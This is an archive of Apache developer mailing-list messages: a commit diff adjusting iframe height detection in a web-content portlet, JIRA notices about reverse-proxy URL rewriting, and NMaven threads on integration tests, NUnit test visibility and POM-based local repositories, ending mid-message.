/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/javascript/iframe_handler.js Date: Fri, 30 Oct 2009 16:44:28 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: woonsan Date: Fri Oct 30 16:44:27 2009 New Revision: 831378 URL: http://svn.apache.org/viewvc?rev=831378&view=rev Log: APA-19: Adding comparison of offsetHeight with scrollHeight if it is available. Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/javascript/iframe_handler.js Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/javascript/iframe_handler.js URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/javascript/iframe_handler.js?rev=831378&r1=831377&r2=831378&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/javascript/iframe_handler.js (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/javascript/iframe_handler.js Fri Oct 30 16:44:27 2009 @@ -17,7 +17,10 @@ function iframePortlet_resetHeight(iframe) { try { if (iframe.contentDocument && iframe.contentDocument.body.offsetHeight) { - iframe.height = iframe.contentDocument.body.offsetHeight + 16; + var offsetHeight = iframe.contentDocument.body.offsetHeight; + if (iframe.contentDocument.body.scrollHeight && iframe.contentDocument.body.scrollHeight > offsetHeight) + offsetHeight = iframe.contentDocument.body.scrollHeight; + iframe.height = offsetHeight + 16; } else if (iframe.Document && iframe.Document.body.scrollHeight) { iframe.height = iframe.Document.body.scrollHeight; } From [email protected] Fri Oct 30 17:00:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29792 invoked from network); 30 Oct 2009 17:00:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 17:00:22 -0000 Received: (qmail 23556 invoked by uid 500); 30 Oct 2009 17:00:22 -0000 Delivered-To: [email protected] Received: (qmail 23532 invoked by uid 500); 30 Oct 2009 17:00:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23522 invoked by uid 99); 30 Oct 2009 17:00:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 17:00:22 +0000 X-ASF-Spam-Status: No, hits=-10.5 required=5.0 tests=AWL,BAYES_00,RCVD_IN_DNSWL_HI X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 17:00:19 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5CFD1234C045 for <[email protected]>; Fri, 30 Oct 2009 09:59:59 -0700 (PDT) Message-ID: <423476505.1256921999366.JavaMail.jira@brutus> Date: Fri, 30 Oct 2009 16:59:59 +0000 (UTC) From: "Woonsan Ko (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (APA-19) Some website's' content height cannot be detected by offsetHeight. In-Reply-To: <127149206.1256921041226.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/APA-19?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Woonsan Ko resolved APA-19. --------------------------- Resolution: Fixed Fixed. > Some website's' content height cannot be detected by offsetHeight. > ------------------------------------------------------------------ > > Key: APA-19 > URL: https://issues.apache.org/jira/browse/APA-19 > Project: Portals Apps > Issue Type: Bug > Components: apa-webcontent > Affects Versions: apa-webcontent-1.1 > Reporter: Woonsan Ko > Assignee: Woonsan Ko > Fix For: apa-webcontent-1.1 > > > with autoresize option in the reverse proxy iframe portlet, some website's page's height is not detected properly. (e.g. JIRA) > In that case, it is helpful to compare with the scrollHeight if it is avaiable. Sometimes scrollHeight can reflect the real height of the content. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Oct 30 17:08:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33760 invoked from network); 30 Oct 2009 17:08:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 17:08:22 -0000 Received: (qmail 35515 invoked by uid 500); 30 Oct 2009 17:08:22 -0000 Delivered-To: [email protected] Received: (qmail 35490 invoked by uid 500); 30 Oct 2009 17:08:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35480 invoked by uid 99); 30 Oct 2009 17:08:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 17:08:22 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 17:08:20 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 727A5234C48C for <[email protected]>; Fri, 30 Oct 2009 10:07:59 -0700 (PDT) Message-ID: <1286589643.1256922479467.JavaMail.jira@brutus> Date: Fri, 30 Oct 2009 17:07:59 +0000 (UTC) From: "Woonsan Ko (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (APA-20) Custom simple text line rewriting feature is needed in reverse-proxy content rewriting MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Custom simple text line rewriting feature is needed in reverse-proxy content rewriting -------------------------------------------------------------------------------------- Key: APA-20 URL: https://issues.apache.org/jira/browse/APA-20 Project: Portals Apps Issue Type: Improvement Affects Versions: apa-webcontent-1.1 Reporter: Woonsan Ko Assignee: Woonsan Ko Fix For: apa-webcontent-1.1 Currently, it provides the following url rewriting features for standard html href or src attributes: (1) slash leading url --> reverse proxied context relative url (2) absolute url --> reverse proxied context relative url However, sometimes, a webpage contains custom javascript or html tags for url information. So, it would be better to provide a simple way to add this kind of options with simple regular expressions and replaces strings. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
From [email protected] Fri Oct 12 18:29:19 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75468 invoked from network); 12 Oct 2007 18:29:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Oct 2007 18:29:18 -0000 Received: (qmail 32395 invoked by uid 500); 12 Oct 2007 18:29:06 -0000 Delivered-To: [email protected] Received: (qmail 32380 invoked by uid 500); 12 Oct 2007 18:29:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32371 invoked by uid 99); 12 Oct 2007 18:29:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Oct 2007 11:29:06 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Oct 2007 18:29:09 +0000 Received: by rv-out-0910.google.com with SMTP id k20so1035346rvb for <[email protected]>; Fri, 12 Oct 2007 11:28:34 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=EHPqnJ+YLvDiamLFXZ5bfuKOARjYHBwzV8QsYkr4CPU=; b=mFJyqPfqwyUL5umKVcPz4OU5J0QtkM2eKTHOZq9wcQacaf8CwM0pwUcMjtz0R+ytzGvAHWiSIXTOe2LJ7TKFxmSBWYyNNsW2n1mCoxdFXuy66eH7NYzpfnR1iaHrpu0q8PW7C4FdczixxJG3h5tlBta7B//lpzZBeonImZhExGU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=n9uJt/2BtJHSiaWYh75abmB0o/jHHFMxSWt4U4Dn2c/EEvbUhpTppY8JCGnCudMkVnDDTTFGmGCNoyWbEHzIx5yBa4m+TAK+NSUK7+Kp7R+QItkGm/cd0iYiK2hOVZpsNpsTgRP9wn8OF9bTT++N7iQ3SsNxuPxrvYSUAam74w4= Received: by 161.129.204.104 with SMTP id p9mr1681962rvk.1192213714009; Fri, 12 Oct 2007 11:28:34 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 12 Oct 2007 11:28:33 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 12 Oct 2007 11:28:33 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Integration Tests MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_32413_5250986.1192213713988" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_32413_5250986.1192213713988 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Since the late July version of NMaven, which includes the new implementation of the resolver and repository, all of the integration tests are invalid. I recently encountered a problem with the web archive packaging not working, which I would have caught earlier had the cases been up-to-date. I'm going to be working on getting a batch of new integration tests written. If anybody has time to jump in and help, I'd appreciate it. Thanks, Shane ------=_Part_32413_5250986.1192213713988-- From [email protected] Fri Oct 12 18:38:58 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79304 invoked from network); 12 Oct 2007 18:38:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Oct 2007 18:38:57 -0000 Received: (qmail 43769 invoked by uid 500); 12 Oct 2007 18:38:45 -0000 Delivered-To: [email protected] Received: (qmail 43745 invoked by uid 500); 12 Oct 2007 18:38:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43736 invoked by uid 99); 12 Oct 2007 18:38:45 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Oct 2007 11:38:45 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Oct 2007 18:38:49 +0000 Received: by rv-out-0910.google.com with SMTP id k20so1037657rvb for <[email protected]>; Fri, 12 Oct 2007 11:38:10 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=3ugI7B5QiQyYoUsvHpQFzX2S6PdCUivsJSzjGgVpxfs=; b=QMkuR+B3rBlNMP9r+HNwNpb8C3mwxAo1N4/MJHHOdP1DBLwDkEiAIF9qrMhDM9OMbZokTp+C1O6jZJToF3p+9KPxirPtAGMWbguDLJbAK9gjzB0QM1vq84fc8uZOgrSYe3kRy8SsY2xUWxe1vfEJCVwWcXqEDPC6srfV9g0YiR4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=i0YZkKG+ZVBJB1JLI2rgsfi42jAvLphNA7be9bYGS/UbCDynX/935Z+cjin6mSB7M5aXuYqSY4qsJKjWwJX7iq4cHSNRQrfHKBEr0CQfsngf0l2SLpF9P884/sa9Nghg12LxYNHHta9M4gV5xTKn1fGgEpkChXwIn8IWQdUMdQA= Received: by 161.129.204.104 with SMTP id s19mr1689523rvi.1192214290374; Fri, 12 Oct 2007 11:38:10 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 12 Oct 2007 11:38:10 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 12 Oct 2007 11:38:10 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: NUnit Tests MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_32430_25690435.1192214290368" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_32430_25690435.1192214290368 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline I was recently working on NUnit tests and I found the current method of how NMaven handles unit testing inadequete. The problem occurs because C#'s protected method is accessible only within the defining class and its derived classes, unlike Java which includes package level access. NMaven currently compiles the test and main artifacts into separate assemblies, so I also can't test an internal method either. This leaves the ability of only testing public methods, which are a little too coarse grained for what I need. One option that I am considering is to 1) compile main artifact,; 2) compile test artifact, which includes both main and test classes. This would require compiling the main classes twice but would allow the testing of internal methods. I am not sure how people are building their .NET applications or whether this option would cause performance problems. Thoughts? Shane ------=_Part_32430_25690435.1192214290368-- From [email protected] Sun Oct 14 16:41:57 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88579 invoked from network); 14 Oct 2007 16:41:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Oct 2007 16:41:57 -0000 Received: (qmail 21818 invoked by uid 500); 14 Oct 2007 16:41:45 -0000 Delivered-To: [email protected] Received: (qmail 21794 invoked by uid 500); 14 Oct 2007 16:41:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21785 invoked by uid 99); 14 Oct 2007 16:41:45 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Oct 2007 09:41:45 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Oct 2007 16:41:49 +0000 Received: by wx-out-0506.google.com with SMTP id h30so1388125wxd for <[email protected]>; Sun, 14 Oct 2007 09:41:00 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=6ZqZsOdVwz7r/Hl7eBXYIgYdudNdxZhBkIPbYNk1LHU=; b=L0vrj23HSNBzxqoCmc9HijHMLJt8I/ZDXirku9ABdS648HS8XneHYKboQsnJJky8kWTkz/6AYbSuD7n4Sf8cSxjM4rAm6nGW/mKdXgdgp7tY2upK0Kx2Dpy+T2N5JU4bU+UUvI3Q+kvcH4jrEp4FQpv4cfUMiosBuZkuqVMCpuk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=E5lQNh/l7nxn+pRmUI/2/H7AHSIZc/BVwjrD7o6gwp+bmWcpC8qUNW6I3axJSvAW8TopNGKUer27Tbhdpv2ZU6NqNOKWAr/d6qNN2E6q7AGdVQa5iG+AhcxEH81jSEUWv6A6FXnNF3VFQ95qN/lq8s8JECN4FjsrhhP1KNlSAgs= Received: by 161.129.204.104 with SMTP id 3mr7552805agy.1192380059902; Sun, 14 Oct 2007 09:40:59 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 14 Oct 2007 09:40:59 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 14 Oct 2007 09:40:59 -0700 From: "Evan Worley" <[email protected]> To: [email protected] Subject: Re: Integration Tests In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_37993_19403736.1192380059897" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_37993_19403736.1192380059897 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Can the old ITs be retrofitted to the new framework, or do we actually have to write entirely new tests? _Evan On 10/12/07, Shane Isbell <[email protected]> wrote: > > Since the late July version of NMaven, which includes the new > implementation > of the resolver and repository, all of the integration tests are invalid. > I > recently encountered a problem with the web archive packaging not working, > which I would have caught earlier had the cases been up-to-date. I'm > going > to be working on getting a batch of new integration tests written. If > anybody has time to jump in and help, I'd appreciate it. > > Thanks, > Shane > ------=_Part_37993_19403736.1192380059897-- From [email protected] Sun Oct 14 16:42:40 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88941 invoked from network); 14 Oct 2007 16:42:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Oct 2007 16:42:40 -0000 Received: (qmail 21920 invoked by uid 500); 14 Oct 2007 16:42:28 -0000 Delivered-To: [email protected] Received: (qmail 21898 invoked by uid 500); 14 Oct 2007 16:42:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21889 invoked by uid 99); 14 Oct 2007 16:42:27 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Oct 2007 09:42:27 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Oct 2007 16:42:31 +0000 Received: by wx-out-0506.google.com with SMTP id h30so1388290wxd for <[email protected]>; Sun, 14 Oct 2007 09:41:43 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=PFdsf/6l97A0AWc2O84Op06Ur00s3CmZWojIsbxAdes=; b=gL+Zc18dnMDfASorccTziPkd8qf7D4G7ThpBhKsF7pkdDPcU2ROLJWvJ05pIvKHwhj0gOc3UKZ8b6A/g1qN6rziES+C7MetMNPplW8Lczpng7gGQU8B1Cr3pE8pJoCAZtczbiEEF1M3NrjHqqdF6Ptl6Vl6KAMTMh2KnzuXuVlE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=DpDIIk5Ft8P7TER4y6zcbEWtSaaDsZoC6awXxvzcl3MfSfB/Qwr3eF/zWxU1z3H2N0WNnUlnKeNuzZYAT8opffaOk0Z7Mr9OhbSwdBFMCtb5f2pq2rolY4EE1TkcfcxbNMjGGft2FShu80O1LdFIefmtaFgb5v63kmK9m9fcQOc= Received: by 161.129.204.104 with SMTP id y17mr7546931agy.1192380103524; Sun, 14 Oct 2007 09:41:43 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 14 Oct 2007 09:41:43 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 14 Oct 2007 09:41:43 -0700 From: "Evan Worley" <[email protected]> To: [email protected] Subject: Re: Integration Tests In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_37997_31081779.1192380103516" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_37997_31081779.1192380103516 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Also on this note, when are we going to get a CI server? Or is there one already? On 10/14/07, Evan Worley <[email protected]> wrote: > > Can the old ITs be retrofitted to the new framework, or do we actually > have to write entirely new tests? > > _Evan > > On 10/12/07, Shane Isbell < [email protected]> wrote: > > > > Since the late July version of NMaven, which includes the new > > implementation > > of the resolver and repository, all of the integration tests are > > invalid. I > > recently encountered a problem with the web archive packaging not > > working, > > which I would have caught earlier had the cases been up-to-date. I'm > > going > > to be working on getting a batch of new integration tests written. If > > anybody has time to jump in and help, I'd appreciate it. > > > > Thanks, > > Shane > > > > ------=_Part_37997_31081779.1192380103516-- From [email protected] Sun Oct 14 16:45:53 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91391 invoked from network); 14 Oct 2007 16:45:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Oct 2007 16:45:53 -0000 Received: (qmail 24012 invoked by uid 500); 14 Oct 2007 16:45:40 -0000 Delivered-To: [email protected] Received: (qmail 24003 invoked by uid 500); 14 Oct 2007 16:45:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23994 invoked by uid 99); 14 Oct 2007 16:45:40 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Oct 2007 09:45:40 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Oct 2007 16:45:44 +0000 Received: by wx-out-0506.google.com with SMTP id h30so1388852wxd for <[email protected]>; Sun, 14 Oct 2007 09:45:06 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=aX0icfbjdwvo1Ow2mkI1GBR8ewxl0ZcY4j8vWyG0+tE=; b=YgU/1up52WNE30R/3Avvzcw5AtuoePgChfX+IUMvrTlqfqzJTA6M+kgBVIiu8+8gCfbquofUOckAo3gwkLy/g+8bKqmEir7RRFBQJQ3dge3b7x5OL0zWDkCSAv0GmFeqktkwO9Gmm4GYP7RGopQ7U2cAUC8l56Tp2gtt2vn8BkY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=hGQ2rdDjkM/VsrQxVJW9Yg+qgEoXzoBj6LqruMvev+TruqMKQ9OyzFNgr53lvpSu99mxET4fD+oV6JOTFHjdMDRmB4GxIffzAkpSkGdnp/m22eDNkcA2FXu2Q2IBcIjaRnlyrBhSRXnGEewW1RXbacPZpDHH2D97zcIItrxgfhY= Received: by 161.129.204.104 with SMTP id t7mr7568264agb.1192380305968; Sun, 14 Oct 2007 09:45:05 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 14 Oct 2007 09:45:05 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 14 Oct 2007 09:45:05 -0700 From: "Evan Worley" <[email protected]> To: [email protected] Subject: Re: NUnit Tests In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_38006_2395200.1192380305962" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_38006_2395200.1192380305962 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline We have the same problem with NMaven testing, where we can't test non public classes due to dll visibility. One solution we were thinking of is adding friendly dll support to NMaven, then we could have the test assembly be friends with the assembly that it's testing. The second approach would be a compile all of the source into the test artifact, which is the option you listed above. Which do you think is a better approach? -Evan On 10/12/07, Shane Isbell <[email protected]> wrote: > > I was recently working on NUnit tests and I found the current method of > how > NMaven handles unit testing inadequete. The problem occurs because C#'s > protected method is accessible only within the defining class and > its derived classes, unlike Java which includes package level access. > NMaven > currently compiles the test and main artifacts into separate assemblies, > so > I also can't test an internal method either. This leaves the ability of > only > testing public methods, which are a little too coarse grained for what I > need. One option that I am considering is to 1) compile main artifact,; 2) > compile test artifact, which includes both main and test classes. This > would > require compiling the main classes twice but would allow the testing of > internal methods. I am not sure how people are building > their .NET applications or whether this option would cause performance > problems. Thoughts? > > Shane > ------=_Part_38006_2395200.1192380305962-- From [email protected] Mon Oct 15 05:35:42 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75496 invoked from network); 15 Oct 2007 05:35:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2007 05:35:42 -0000 Received: (qmail 67294 invoked by uid 500); 15 Oct 2007 05:35:30 -0000 Delivered-To: [email protected] Received: (qmail 67274 invoked by uid 500); 15 Oct 2007 05:35:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67265 invoked by uid 99); 15 Oct 2007 05:35:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 14 Oct 2007 22:35:29 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sonatype.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 15 Oct 2007 05:35:32 +0000 Received: (qmail 21006 invoked from network); 15 Oct 2007 05:35:11 -0000 Received: from c-76-102-11-171.hsd1.ca.comcast.net (HELO [161.129.204.104]) ([email protected]@[161.129.204.104]) (envelope-sender <[email protected]>) by mail.sonatype.com (qmail-ldap-1.03) with SMTP for <[email protected]>; 15 Oct 2007 05:35:11 -0000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Jason van Zyl <[email protected]> Subject: NMaven not using POMs in local repository Date: Sun, 14 Oct 2007 22:35:10 -0700 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Hi Shane, Do you have any plans for switching the local repository mechanism back to using POMs? I would at least like to have a flavor that works like Maven normally does and for this to be the default. For me this is requisite for NMaven to be integrated into the Maven project. I realize that there are shortcomings with the artifact resolution mechanism and using RDF might be good for exploration, but it makes NMaven too divergent from Maven IMO, is confusing to users and really makes NMaven something different. I think you're having a hard enough time getting a community going and I don't think this fundamental difference in behavior is going to help much in that respect. For me, the three groups I know who are using it, use both Java and .NET and I always get asked why doesn't NMaven use POMs like Maven? Will NMaven not currently work without RDF? And do you really see there being value in being wholly different with respect to local repository metadata? On 30 Sep 07, at 7:57 PM 30 Sep 07, Shane Isbell wrote: > Hi Paul, > > When NMaven checks for the existence of a file locally, it looks in > the uac > directory not the repository directory. I am wondering whether the > meta-data > in your RDF repo is correct. Can you try: > > mvn org.apache.maven.dotnet.plugins:maven-repository- > plugin:export-rdf > > and post the results of the > .m2/uac/rdfRepository/rdf-repository-export.xmlto a jira? I'll take a > look at it as a starting point to track down the > problem. > > Thanks, > Shane > > > On 9/28/07, paul anderson <[email protected]> wrote: >> >> Greetings. Seasoned java/regular maven user here. Now working >> with .NET . >> . . . . >> >> Building went fine - (had csc and xsd.exe on path). >> >> problem came when trying to actually use : mvn compile with a valid >> pom.xml file in the directory >> (note that I also did not have an nmaven-settings.xml file - not sure >> why): >> >> got this (between * for easy parsing): >> >> ********************************************************************* >> ************** >> [INFO] Scanning for projects... >> [INFO] >> --------------------------------------------------------------------- >> ------- >> [INFO] Building Unnamed - snipped:ratecube:library:1.0 >> [INFO] task-segment: [compile] >> [INFO] >> --------------------------------------------------------------------- >> ------- >> 